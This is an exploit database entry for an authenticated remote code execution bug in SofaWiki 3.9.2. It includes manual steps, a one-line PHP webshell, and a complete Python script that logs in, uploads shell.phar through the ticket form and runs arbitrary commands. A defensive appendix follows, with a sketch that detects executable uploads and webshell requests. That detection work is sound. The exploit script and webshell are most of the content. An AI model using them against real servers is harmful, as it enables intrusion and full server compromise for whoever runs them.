0day.today - Biggest Exploit Database in the World.
SofaWiki 3.9.2 Shell Upload Exploit
# Exploit Title: SofaWiki 3.9.2 - Remote Code Execution (RCE) via Open Ticket File Upload
# Exploit Author: Chokri Hammedi
# Vendor Homepage: https://www.sofawiki.com
# Software Link: https://www.sofawiki.com/site/files/snapshot.zip
# Version: 3.9.2
# Tested on: Windows XP

Summary:
A remote code execution (RCE) vulnerability exists in the Open Ticket feature of SofaWiki 3.9.2. An attacker can upload a malicious `.phar` file that contains PHP code, bypassing `.htaccess` restrictions, and execute arbitrary commands on the server.

Exploit Steps:
1. Login to SofaWiki.
2. Navigate to Special → Tickets → New Ticket:
   http://localhost/sofawiki/index.php?name=special:tickets&ticketaction=new
3. Select your shell.phar file with this content:
   <?php system($_GET['cmd']); ?>
4. Fill in the ticket title and click Open Ticket.
5. After the ticket is created, the page shows a link to the uploaded shell.phar
6. access the webshell:
   http://localhost/sofawiki/site/files/ticket-1-shell.phar?cmd=whoami

--------------

# Exploit Title: SofaWiki 3.9.2 - RCE (authenticated) via Open Ticket File Upload Exploit
# Date: 10/17/2024
# Exploit Author: Chokri Hammedi
# Vendor Homepage: https://www.sofawiki.com
# Software Link: https://www.sofawiki.com/site/files/snapshot.zip
# Version: 3.9.2
# Tested on: Windows XP

import requests
import re
import sys


class SofaWikiExploit:
    def __init__(self, base_url, username, password):
        self.base_url = base_url.rstrip('/')
        self.username = username
        self.password = password
        self.session = requests.Session()

    def detect_login_name(self):
        response = self.session.get(f"{self.base_url}/index.php?action=login")
        match = re.search(r'name="name" value="([^"]+)"', response.text)
        if not match:
            print("\033[91m\033[1m[-] couldn't find the 'name' field. Exiting.\033[0m")
            sys.exit(1)
        return match.group(1)

    def login(self):
        print("\033[93m[*] logging in...\033[0m")
        login_name = self.detect_login_name()
        data = {
            "submitlogin": "Login",
            "username": self.username,
            "pass": self.password,
            "name": login_name,
            "action": "login"
        }
        response = self.session.post(f"{self.base_url}/index.php", data=data)
        if "Logout" in response.text:
            print("\033[92m\033[1m[+] Login successful!\033[0m")
            return True
        print("\033[91m[-] login failed.\033[0m")
        return False

    def upload_shell(self):
        print("\033[93m[*] uploading shell...\033[0m")
        shell_content = '<?php system($_GET["cmd"]); ?>'
        files = {
            'uploadedfile': ('shell.phar', shell_content, 'application/octet-stream'),
            'title': (None, 'Chokri Hammedi Exploit'),
            'text': (None, 'Chokri Hammedi RCE'),
            'assigned': (None, 'admin'),
            'priority': (None, '1 high'),
            'submitopen': (None, 'Open Ticket'),
            'MAX_FILE_SIZE': (None, '8000000')
        }
        response = self.session.post(f"{self.base_url}/index.php?name=special:tickets", files=files)
        match = re.search(r'File (.*?) uploaded', response.text)
        if not match:
            print("\033[91m[-] shell upload failed.\033[0m")
            sys.exit(1)
        shell_url = f"{self.base_url}/site/files/{match.group(1)}"
        print(f"\033[92m[+] shell uploaded: {shell_url}\033[0m")
        return shell_url

    def execute_command(self, shell_url, cmd):
        print(f"\033[93m[*] running command: {cmd}\033[0m")
        response = self.session.get(f"{shell_url}?cmd={cmd}")
        print("\033[92m[+] command output:\033[0m")
        print(f"\033[1m{response.text}\033[0m")


if __name__ == "__main__":
    if len(sys.argv) != 5:
        print(f"\033[91musage: {sys.argv[0]} <target_url> <username> <password> <cmd>\033[0m")
        sys.exit(1)
    target_url, username, password, cmd = sys.argv[1:5]
    exploit = SofaWikiExploit(target_url, username, password)
    if exploit.login():
        shell_url = exploit.upload_shell()
        exploit.execute_command(shell_url, cmd)

# 0day.today [2024-12-23] #
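
For defenders, the advisory's two observable artifacts are a script-capable file in the ticket upload directory and a web request that executes it. The following is an added detection sketch, not part of the original advisory or of SofaWiki; the extension list assumes a server that routes `.phar`/`.phtml`/`.php*` to the PHP handler, and the log lines are constructed samples in combined-log format.

```python
import re
from pathlib import Path

# Extensions commonly routed to the PHP handler (for example a
# FilesMatch ".+\.ph(ar|p|tml)$" rule); an assumption about the server config.
PHP_EXT = re.compile(r"\.(?:php\d?|phtml|phar|pht)$", re.IGNORECASE)
# Request field of a combined-format access log: "METHOD /path?query HTTP/x"
REQUEST = re.compile(r'"(?:GET|POST) (?P<path>[^ ?"]+)(?:\?(?P<query>[^ "]*))? HTTP/')
UPLOAD_PREFIX = "/site/files/"  # upload directory named in the advisory


def audit_uploads(upload_dir):
    """Return sorted names of uploaded files that could run as PHP."""
    hits = []
    for f in Path(upload_dir).iterdir():
        if not f.is_file():
            continue
        head = f.read_bytes()[:4096]
        # Flag by extension, or by a PHP open tag hidden under another extension.
        if PHP_EXT.search(f.name) or b"<?php" in head.lower():
            hits.append(f.name)
    return sorted(hits)


def flag_requests(log_lines):
    """Return (path, query) for requests to script-like files in the upload dir."""
    hits = []
    for line in log_lines:
        m = REQUEST.search(line)
        if not m:
            continue
        path = m.group("path")
        if UPLOAD_PREFIX in path and PHP_EXT.search(path):
            hits.append((path, m.group("query") or ""))
    return hits


# Constructed sample log lines (not from a real server).
SAMPLE_LOG = [
    '192.0.2.10 - - [17/Oct/2024:10:00:01 +0000] "GET /sofawiki/site/files/ticket-1-notes.pdf HTTP/1.1" 200 5120',
    '192.0.2.10 - - [17/Oct/2024:10:00:09 +0000] "GET /sofawiki/site/files/ticket-1-shell.phar?cmd=whoami HTTP/1.1" 200 24',
    '192.0.2.11 - - [17/Oct/2024:10:01:00 +0000] "GET /sofawiki/index.php?name=special:tickets HTTP/1.1" 200 9000',
]

if __name__ == "__main__":
    for path, query in flag_requests(SAMPLE_LOG):
        print(f"executable upload requested: {path} query={query!r}")
```

Any hit from `audit_uploads` is worth triage on its own, since a ticket attachment has no reason to be served through the PHP handler; disabling script execution for the upload directory in the server configuration removes the condition both checks look for.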